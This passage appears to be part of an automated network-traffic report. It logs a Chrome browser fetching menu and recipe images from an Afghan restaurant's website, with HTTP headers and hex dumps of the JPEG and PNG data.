                                                                                                                                                    2024-10-01 04:26:55 UTC15252INData Raw: dc c3 fd 79 a8 dc f1 ce 6c 78 d0 08 06 94 22 60 f6 7b b5 d2 b7 24 0c 1a 28 2a 28 61 c0 30 a5 ba 74 ab 9c 4a 1c 01 f8 4f 95 a9 80 5d 27 36 9a 36 97 f8 70 0c f0 8a 0c f8 a0 ca 95 11 74 b1 c8 81 5a 6e 38 6c 70 31 95 10 48 d4 33 8c 0c d2 ad c6 e6 51 c4 4e 1e 9a 2f 6c ca 1c d0 1c 3e ef 9a 8a de 59 b7 da 31 22 b5 5a 70 d6 a3 11 38 d4 b7 81 b2 6e ca 01 09 52 0e 04 d2 84 e6 be 4c 14 19 0e f7 a2 0c 11 d8 7b 3d ed 54 6f 6c 6e 5c f9 66 e9 b1 ea 6d cc 5b 27 b6 ee df f8 6f f6 28 be ea ca fc cf 66 b9 df b1 e2 00 79 9e da f8 28 2e e4 b6 dd f2 87 80 27 d3 e0 fb d5 af 6f 75 6e 03 8e 07 1f aa a3 57 a8 8a 9d 30 7b 56 b9 1a 47 61 ae 74 03 eb fd 74 a9 bb 54 bb f2 db ce 00 6b 48 79 52 3f 97 a3 9b a9 ed d0 64 69 04 61 fe a6 8c e1 de 6a 27 51 ee 15 82 30 f4 e1 5c 04 f7 cd 49 32
                                                                                                                                                    Data Ascii: ylx"`{$(*(a0tJO]'66ptZn8lp1H3QN/l>Y1"Zp8nRL{=Toln\fm['o(fy(.'ounW0{VGattTkHyR?diaj'Q0\I2
                                                                                                                                                    2024-10-01 04:26:55 UTC12620INData Raw: 30 a0 4e 64 63 8c fd 18 ff 00 a3 86 07 eb 14 5b 6c 16 db 13 31 92 93 ef 7b 14 db 2d db 7e 57 76 be 2b 57 46 99 07 15 6b 6d e1 65 ad 48 c0 fa 3f fb 56 75 dd f4 6d 10 41 07 70 8c d8 e4 2d 87 be cd fb 35 7b 72 c4 13 76 e5 c7 23 e2 76 6a 6e d8 81 c6 4f 0a b8 8a ba 53 69 b2 b6 ac 54 60 08 b6 35 7d ad 54 a4 99 47 b9 d5 70 73 82 7f de a4 e5 e5 60 5b 57 96 17 f6 a9 d5 db 4a 59 25 6d db b6 48 58 f6 a9 74 39 4b a4 8d 2e 33 1e f1 ae 96 e9 6c de be 18 9e a0 50 27 d8 0f 46 ca a2 f4 9a 7a 96 75 60 9a bc e1 7c aa f5 1f 27 d0 a5 8f 32 13 89 f8 1c f8 69 97 e6 db 46 d7 05 ac ee 43 82 54 83 e1 5d 1e 0a 63 70 db bf b7 92 e3 a8 5b a9 24 69 d3 ab c2 ab 4d 79 80 42 aa 4e 86 32 3d 1e d5 32 94 7b 30 d0 ad 1a 80 fd fa d6 84 5c 04 e2 57 b3 d7 44 91 1d 83 fa 6b 2a 40 fc 08 d4 d3 c3
                                                                                                                                                    Data Ascii: 0Ndc[l1{-~Wv+WFkmeH?VumAp-5{rv#vjnOSiT`5}TGps`[WJY%mHXt9K.3lP'Fzu`|'2iFCT]cp[$iMyBN2=2{0\WDk*@


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    123192.168.2.449889162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:55 UTC381OUTGET /assets/imgs/res_menu3.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:55 UTC354INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:55 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Fri, 29 Sep 2023 22:07:40 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 370443
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:55 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:55 UTC16030INData Raw: ff d8 ff e1 23 af 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 11 01 00 00 03 00 00 00 01 17 70 00 00 01 01 00 03 00 00 00 01 0f a0 00 00 01 02 00 03 00 00 00 03 00 00 00 da 01 06 00 03 00 00 00 01 00 02 00 00 01 0f 00 02 00 00 00 06 00 00 00 e0 01 10 00 02 00 00 00 12 00 00 00 e6 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 f8 01 1b 00 05 00 00 00 01 00 00 01 00 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 22 00 00 01 08 01 32 00 02 00 00 00 14 00 00 01 2a 02 13 00 03 00 00 00 01 00 02 00 00 9c 9d 00 01 00 00 00 02 00 00 00 00 87 69 00 04 00 00 00 01 00 00 01 40 88 25 00 04 00 00 00 01 00 00 05 2c 00 00 05 40 00 08 00 08 00 08 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 32 30 30
                                                                                                                                                    Data Ascii: #ExifMM*p(1"2*i@%,@CanonCanon EOS 200
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 7b 08 f7 07 54 3f d1 ff 00 57 f3 d6 e7 55 e9 7d 1f af e2 53 90 5a ea ed 73 85 18 f9 4c 03 d5 61 27 6b 19 0e fe 95 8c df f4 36 7d 0f f0 16 54 a8 f5 ae 83 d4 4f 57 6d fb 31 df 89 7b db 65 39 75 86 fa a3 68 da fc 37 3a b6 b1 f7 7e 99 de cc 8b ff 00 9c c7 ff 00 31 6c 65 de ce 99 8d 65 e0 03 5f 47 c7 36 b4 11 a3 b2 5f fa 2c 56 1f eb 5e f5 a7 8e 57 0f 50 e8 d0 cb 10 27 70 d2 fb 3f ff d3 a4 6d 0d 30 46 9e 23 85 20 77 0f 6b 83 41 50 7d 40 3b 69 d4 a1 d9 5e df 18 e4 c1 d5 53 b2 1b 20 02 bb 9c 1a 76 cc 9e c9 56 37 31 da a1 02 e6 cb b6 e9 e1 dd 11 ce 15 d6 5c 03 8b 9d 10 d1 1a 7d e1 c9 f1 97 74 48 0e 8e 87 d5 7c 83 8d d6 aa 60 77 b3 24 fa 56 0e c6 7e 87 f9 af 5d ab fa 7d 77 3a ca dc 27 6f 13 c7 c3 45 e6 38 1d 44 e1 75 7c 5c bb 2a 26 aa 6d 0f 78 05 ce 7c 0d 1c e6 b6
                                                                                                                                                    Data Ascii: {T?WU}SZsLa'k6}TOWm1{e9uh7:~1lee_G6_,V^WP'p?m0F# wkAP}@;i^S vV71\}tH|`w$V~]}w:'oE8Du|\*&mx|
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 79 e3 f7 eb 2c 8c 5f bb 31 ef e5 8c eb ed 32 3b ad bc 6a 45 63 40 a3 bb 95 ec 71 29 8e 31 e2 08 c5 32 b5 2b 8f 65 10 65 69 d9 89 ef d4 e2 41 5d 74 48 89 28 05 f4 08 8c 0d 45 06 2f 52 0b 2f 9f f9 29 b4 99 20 be d9 41 97 4c 5a 88 58 d2 9a 42 45 51 52 29 9f 4e d8 9e 29 24 21 53 23 12 69 83 11 4b 25 33 6b 79 8e 60 65 8e d1 08 29 34 82 50 68 47 7a 62 0a 37 29 cf b0 c3 a8 fa e0 48 44 e5 38 8d 23 19 35 01 03 02 88 04 de e4 42 72 5c f1 c1 d1 f1 05 21 1c 08 73 c7 19 15 31 84 57 6f 6c 42 d6 94 18 0d 4a 7c 66 02 1e fe 92 46 25 94 f3 49 87 ed 5f c7 1d c5 04 a4 ba 2d 4c 10 09 0e 57 23 5b 74 38 96 50 e9 f4 1a c5 32 a1 f1 c0 98 ba 91 22 11 15 f7 07 a8 65 4c f0 a9 40 27 57 6a 3f 61 b8 18 c8 56 3f 4a e2 ac ea ec ae 46 d5 31 b2 dd d2 80 16 eb d7 15 cd 44 15 26 48 fc 5b ba
                                                                                                                                                    Data Ascii: y,_12;jEc@q)12+eeiA]tH(E/R/) ALZXBEQR)N)$!S#iK%3ky`e)4PhGzb7)HD8#5Br\!s1WolBJ|fF%I_-LW#[t8P2"eL@'Wj?aV?JF1D&H[
                                                                                                                                                    2024-10-01 04:26:55 UTC15252INData Raw: a4 6f b6 a3 0f 84 92 26 0a 60 2c 99 4e 67 f0 c1 f3 08 45 5c 91 ab 6f 6e 34 01 bf 6e 00 cf b2 3f 65 25 76 63 70 68 32 f3 c4 09 17 5c 6b 0c a2 f7 51 8a 9a 0c 5a 81 55 6c 87 64 95 bd aa bb 00 7e 98 63 aa e6 28 e2 ed d1 e9 04 65 96 00 d8 a3 82 6b 24 46 26 a0 fc 30 2e 13 63 02 96 86 13 31 cf b7 73 88 24 26 80 51 21 65 97 a7 af 61 80 e6 cb b8 72 5d 45 66 c8 e0 d3 cf 01 3b 53 61 4a 37 15 aa ba 8d 43 ae 2a 9b 15 a1 11 10 8a db db 88 80 ed e5 81 2e 57 38 29 e6 ae e3 2c 47 26 5d c1 73 a3 57 5c 42 86 49 bd a8 7e a4 1f 2c 4b ae 0c 17 8b 6c 8b ea a7 4c 1e a8 24 42 ed a3 8e 99 e4 7f 7e 16 64 42 98 87 4d 24 58 c7 86 24 4c a2 e0 10 db 86 45 07 20 3c 30 d0 e5 07 1d 54 66 77 25 ce 93 97 86 1b 14 d6 d1 0e 9a 7a 65 5f ae 1f 18 aa b6 49 91 0d bd 4c a6 ba be b8 55 a5 95 8c 78
                                                                                                                                                    Data Ascii: o&`,NgE\on4n?e%vcph2\kQZUld~c(ek$F&0.c1s$&Q!ear]Ef;SaJ7C*.W8),G&]sW\BI~,KlL$B~dBM$X$LE <0Tfw%ze_ILUx
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 03 2c 12 86 05 26 b1 37 50 7f 0c 18 92 4c eb 29 78 0b c6 f5 1f b3 07 cd 23 da 25 49 21 9d da 3a 69 ae 59 e0 0d 8b 85 45 7b 46 02 a1 41 ae 20 58 a6 55 af 5b 35 3e 93 e6 2b 83 74 93 12 91 88 be b1 a6 a0 8e f8 e2 51 08 14 7a 0b 9b d4 50 a3 51 03 0a 90 05 36 2e 12 73 5c 5e 39 ab 02 7c 41 c0 10 13 a2 13 53 72 ea d4 65 fa d7 1c e5 19 80 4c e7 9f 53 11 d3 c0 60 a2 e8 25 10 85 4d 56 ad 2b e7 5c 58 89 55 2c 03 a2 1d 24 66 b9 03 f4 c3 81 55 24 92 00 ae 7f bf 12 81 97 8a d9 82 4f d7 1c a4 ba 26 97 3a 40 03 f0 ae 39 97 02 94 37 fa 86 95 39 f5 c4 71 44 0a 5a 0b a9 19 80 66 cf a6 04 c5 d1 44 b2 3f 6c 0b 00 75 7e 18 4c a9 05 58 8e 49 8a 33 14 a1 10 83 9e 15 2a 02 74 32 cf 55 d2 4e e5 f2 24 01 d3 15 a5 5a b7 1b 81 4b fe 7a e2 32 40 63 4c 01 ad 30 49 d3 db 7d f2 e2 25 15
                                                                                                                                                    Data Ascii: ,&7PL)x#%I!:iYE{FA XU[5>+tQzPQ6.s\^9|ASreLS`%MV+\XU,$fU$O&:@979qDZfD?lu~LXI3*t2UN$ZKz2@cL0I}%
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: ed db 69 73 6c c3 d0 9d 32 cf ae 2f 51 82 67 ac ff 00 05 93 91 9e 4e 83 65 f5 03 87 7c 41 c6 78 fd ac 30 59 ed 50 44 b1 a8 02 91 80 29 fb 31 b1 5d 11 8e c1 96 54 ed 25 58 a3 68 b0 db cf f4 ed e3 f4 8c c0 00 61 92 8a 08 92 84 dc 4b 6b ac e4 a8 3b 01 81 44 9a 7e 6a d6 33 5d 4b 4f ae 25 49 5d a6 f5 6f 01 aa 4f a2 b4 cd 4e 04 c8 29 00 a9 3d 8f 2a d9 95 0f e7 b7 a9 28 3a 2b 31 a7 ec 03 08 93 3e 81 38 00 77 28 26 e5 ca 76 c6 91 bf 20 c6 55 1f fb 94 20 1f db 86 42 65 2a 51 8b e8 84 9e 4e e4 fa 10 9a f4 c1 99 a1 e2 bf 7f 7a bf 97 ed 04 62 39 15 c4 2f da f7 19 ce 6c 45 7a e3 b5 5c 9c c3 b7 5c 3e 6e ec 46 25 94 12 11 58 36 7a 9c d7 f6 e0 b8 a8 e4 8c c3 b2 a9 a7 a7 13 c5 41 92 24 bb 24 7a 6b a7 a6 3b 8a 87 28 2e e9 6f 14 09 41 1d 08 14 38 82 19 18 2e 14 22 79 14 31
                                                                                                                                                    Data Ascii: isl2/QgNe|Ax0YPD)1]T%XhaKk;D~j3]KO%I]oON)=*(:+1>8w(&v U Be*QNzb9/lEz\\>nF%X6zA$$zk;(.oA8."y1
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 77 56 91 dc ce ff 00 2d b5 95 c2 5c db 3c b2 05 86 cd 4b aa 84 1f 6d 48 cb cf 16 6e 30 c9 22 32 71 ae 83 60 aa 43 fd 90 fa 14 3a fe c0 d9 4d 70 84 98 21 04 00 ac 68 49 23 af e3 d3 08 b3 10 d6 fd 02 6d 77 f3 f8 a8 6d cb c6 f7 02 d4 7a 83 fd bf 5f 3c 67 ce a0 74 dd 5c ae 46 3a 94 c3 90 42 db 1c 36 c5 94 2c 92 f7 3f e9 88 18 d3 ac ed ba 8b 6c 8d a3 75 9e fe 4f 9d 2e ec a3 66 19 a3 1a 01 e1 fe fc 6f f8 98 c8 48 ba f3 5e 4c 00 34 59 f2 e9 d6 50 10 2e 43 fd a9 8f 43 1d 16 1c a4 0a 0b 2c 45 09 2a 69 4c 58 89 05 67 5d 00 7a 2e ad af e5 81 ba 57 b5 0f 4c 4f b4 0a cf b2 90 36 46 12 f2 49 a8 4f 7c 77 b4 aa 18 6a bf 7e 68 8d 6a 5b 2a 64 30 42 b4 51 ab 91 d5 02 96 77 79 8e 91 82 90 65 a7 8f 54 01 45 ad 20 92 40 0a a1 72 7c 31 5a 51 27 65 b3 59 01 14 1b 7d eb 7f fc 3b
                                                                                                                                                    Data Ascii: wV-\<KmHn0"2q`C:Mp!hI#mwmz_<gt\F:B6,?luO.foH^L4YP.CC,E*iLXg]z.WLO6FIO|wj~hj[*d0BQwyeTE @r|1ZQ'eY};
                                                                                                                                                    2024-10-01 04:26:55 UTC16336INData Raw: 26 d9 56 f7 97 8c ee d3 dc 4b ee 4c 73 2d 5e 9f 4c 31 03 28 3e f1 be a4 21 c0 93 30 30 32 93 23 01 51 7c bf 9c 5a ed 96 f3 dc dd dd 2c 31 a0 25 8b 1a 74 c2 65 26 dd 58 ae b7 5f 34 be 6b fd 43 5e 6e d3 5c 6c bc 72 e0 ac 3e a5 9a e9 4f f8 63 1f 2f 3b fb 61 f8 ad bc 5c 1d a5 25 8c ee ae 66 9a 49 26 96 56 79 65 25 a4 91 8d 4b 13 d6 b8 ca 11 75 ab c8 84 d7 df 96 9e 24 62 0c 40 4e 8c ca 51 2e 5f a1 ad 30 3c 5d 4f 25 d7 ba 5c d2 bd 7b e2 0c 14 89 85 f9 51 ab 9f 7c 4c 62 c8 27 37 d9 3a 2a 91 af a8 82 4e 0c 90 97 ed 92 9a 4c f1 e9 24 63 84 94 fb 28 7b ae af b7 af 4c 30 49 26 50 64 47 60 e2 7b ef 2f dd ad f6 4d 82 c1 ef af ae 18 0a 28 25 63 07 f8 9c 8e 83 13 cd f4 1b a5 ce c8 c2 2e 57 d4 8f 81 7f 4b bb 17 02 82 0d ef 90 42 9b af 23 95 43 bc 92 0a ac 44 8a d1 47 6a
                                                                                                                                                    Data Ascii: &VKLs-^L1(>!002#Q|Z,1%te&X_4kC^n\lr>Oc/;a\%fI&Vye%Ku$b@NQ._0<]O%\{Q|Lb'7:*NL$c({L0I&PdG`{/M(%c.WKB#CDGj
                                                                                                                                                    2024-10-01 04:26:55 UTC48INData Raw: 45 0e 2e 42 7c 83 2a 76 56 01 f8 6d e8 7b af 81 5f 31 fc 17 cc be 0d e6 97 dc 7f 78 d4 f6 be eb 1d 9f 73 0a 44 73 c2 73 5a 1e 95 03 ae 31 73 31
                                                                                                                                                    Data Ascii: E.B|*vVm{_1xsDssZ1s1
                                                                                                                                                    2024-10-01 04:26:55 UTC1486INData Raw: 4d 67 90 d8 ad ec 0c e8 da 38 cf f5 8d fd 7d 42 ad a3 dd f7 3b 64 35 1e e9 5c 67 39 0b 53 8d 72 49 cf c9 a7 9e 22 ad 0e 99 06 47 eb e3 8e 25 14 28 88 51 2b db db 89 98 96 f4 8f 0c 10 74 c3 5c 3a a1 72 cc 40 f5 77 c3 04 49 4b 33 84 53 49 26 5e d9 1e f8 98 c4 84 33 b2 24 25 a1 dc 0c 3d 05 47 8e 18 aa 90 97 fe ea 7f 9b 1c e9 6c bf ff d7 f9 6f 34 8a 03 00 3a 8e f8 c2 8a f4 32 0b 8e 31 c9 f9 27 09 dd 97 77 e3 db 93 5b 4a ae 1a 4b 37 ab 41 28 19 e9 74 f0 3e 58 73 0f 81 55 e6 17 d1 7f 86 bf 53 3f 16 73 05 8b 61 f9 2e e7 fe c4 e4 26 33 ec 6e 37 2c 45 85 c4 80 65 ed dd 0f f9 64 f8 38 a6 19 1c b9 d7 fa b5 1d c7 f1 0a bc ea 84 b7 d0 ad 7b b8 f0 cd df 6e b1 87 78 d9 b7 1b 7e 41 b2 dc c6 b2 5b dc 24 8a c5 d5 80 35 8e 44 26 37 14 35 eb 5c 68 53 93 1b 03 82 e3 d1 54 b7
                                                                                                                                                    Data Ascii: Mg8}B;d5\g9SrI"G%(Q+t\:r@wIK3SI&^3$%=Glo4:21'w[JK7A(t>XsUS?sa.&3n7,Eed8{nx~A[$5D&75\hST


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    124192.168.2.449891162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:55 UTC390OUTGET /assets/imgs/food_menu_mainfood.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:55 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:55 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:22 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 19239
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:55 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:55 UTC16032INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 44 00 00 00 40 08 06 00 00 00 a3 82 d1 a4 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 3b 6a 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDRD@pHYs;jiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:55 UTC3207INData Raw: d8 7f 2a 70 b3 80 e0 be c1 5e eb 2d 07 f2 56 3d ef 7f aa 56 2d f0 bc cd 8d f4 96 12 b3 4d 92 a0 7c 4d 0f 9d 69 e6 6b 12 20 e5 8a a7 4a b5 40 76 b0 af 15 f0 79 e0 62 27 f1 a8 bf 5f a5 56 79 4c ef 38 1c e7 7e e9 02 bd cf eb 67 02 27 3a 8e d4 66 c8 44 7f f0 1e b7 08 ca 0e e0 8f 92 71 a3 01 29 0b 44 d5 69 c0 04 99 bd 54 46 9f 04 ec 94 d9 7f 63 f8 8c 17 bc 77 95 e7 f1 08 7c 0c 70 a1 d7 9f 0b e4 01 3f f4 9c c2 66 e0 95 62 e0 29 89 75 2a 70 8d e1 bc ba a9 59 66 3b b0 51 ab 75 17 b8 24 e3 bd bd 37 2e f2 c6 fd b5 4a 4b 09 36 49 4f ea ea b9 e9 01 09 b6 d7 bb a6 09 cc 6e e0 cf c0 3f 3d 6f a0 ca 34 d3 ef 8d d9 0a 80 5f 03 ff 02 4e 07 ae 76 2c 4d ca 32 a9 56 9e e5 b2 f5 41 7f df 08 6c 52 be df 2e 30 99 8a b4 12 0b b2 62 15 ec 19 82 b4 01 58 a4 2e c9 03 9e 35 ec 7a 08
                                                                                                                                                    Data Ascii: *p^-V=V-M|Mik J@vyb'_VyL8~g':fDq)DiTFcw|p?fb)u*pYf;Qu$7.JK6IOn?=o4_Nv,M2VAlR.0bX.5z


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    125192.168.2.449892162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:55 UTC664OUTGET /assets/imgs/food_menu_beverage.png HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:55 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:55 GMT
                                                                                                                                                    content-type: image/png
                                                                                                                                                    last-modified: Wed, 05 Apr 2023 14:05:28 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 20129
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:55 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:55 UTC16384INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 37 00 00 00 30 08 06 00 00 00 b5 de e2 fe 00 00 00 09 70 48 59 73 00 00 12 74 00 00 12 74 01 de 66 1f 78 00 00 3f 63 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 20 20 20 20 20 20 22 3e 0a 20 20 20 3c 72 64 66
                                                                                                                                                    Data Ascii: PNGIHDR70pHYsttfx?ciTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf
                                                                                                                                                    2024-10-01 04:26:55 UTC3745INData Raw: 88 87 c0 43 50 40 88 37 5e 50 10 91 e0 25 4f e1 f6 10 08 48 91 88 84 00 21 21 88 42 22 14 09 01 22 4a 90 6c 27 32 81 00 22 36 0e 04 67 18 cf ad 2f d3 5d 97 73 d9 7b 2f 1e 4e 75 4f cf 4c f7 4c cd d8 11 25 75 75 77 55 9d 53 67 ed b5 d6 bf fe ff df 47 cc 8c a3 1e dd ce e7 71 a5 83 6e 46 5d 9f 65 ab 7e 33 5e 3b c6 ee 12 d3 16 64 f0 30 1a 37 71 f3 6f 33 0f 15 2e 1f 31 1a 8d 88 d9 59 84 84 62 14 d5 3a e2 32 92 19 86 62 ed 84 f6 fa d7 21 4e 31 3c 88 90 95 a7 70 31 10 e6 57 70 e3 07 11 cd 8b 38 bb fc 7d 48 f9 eb 52 9e b9 2c be f8 04 c4 97 58 e2 91 0f 1f ba e9 7f cf ff cb 43 40 f6 ff 32 cc 02 88 01 54 b8 c1 07 dc ea 63 1f 92 50 3f 45 ac ff 24 85 e6 ba 88 60 37 8e c4 96 fc 96 fb 08 2e 1d fa db 80 78 0f 5f 77 7b 90 86 41 ac 45 fd f8 9d 7e f4 d6 5f 4c d6 7d c0 da ab
                                                                                                                                                    Data Ascii: CP@7^P%OH!!B""Jl'2"6g/]s{/NuOLL%uuwUSgGqnF]e~3^;d07qo3.1Yb:2b!N1<p1Wp8}HR,XC@2TcP?E$`7.x_w{AE~_L}


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    126192.168.2.449893162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:55 UTC658OUTGET /assets/imgs/img_recipe_7.jpg HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/assets/css/custom.css
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:55 UTC354INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:55 GMT
                                                                                                                                                    content-type: image/jpeg
                                                                                                                                                    last-modified: Thu, 05 Oct 2023 21:19:30 GMT
                                                                                                                                                    accept-ranges: bytes
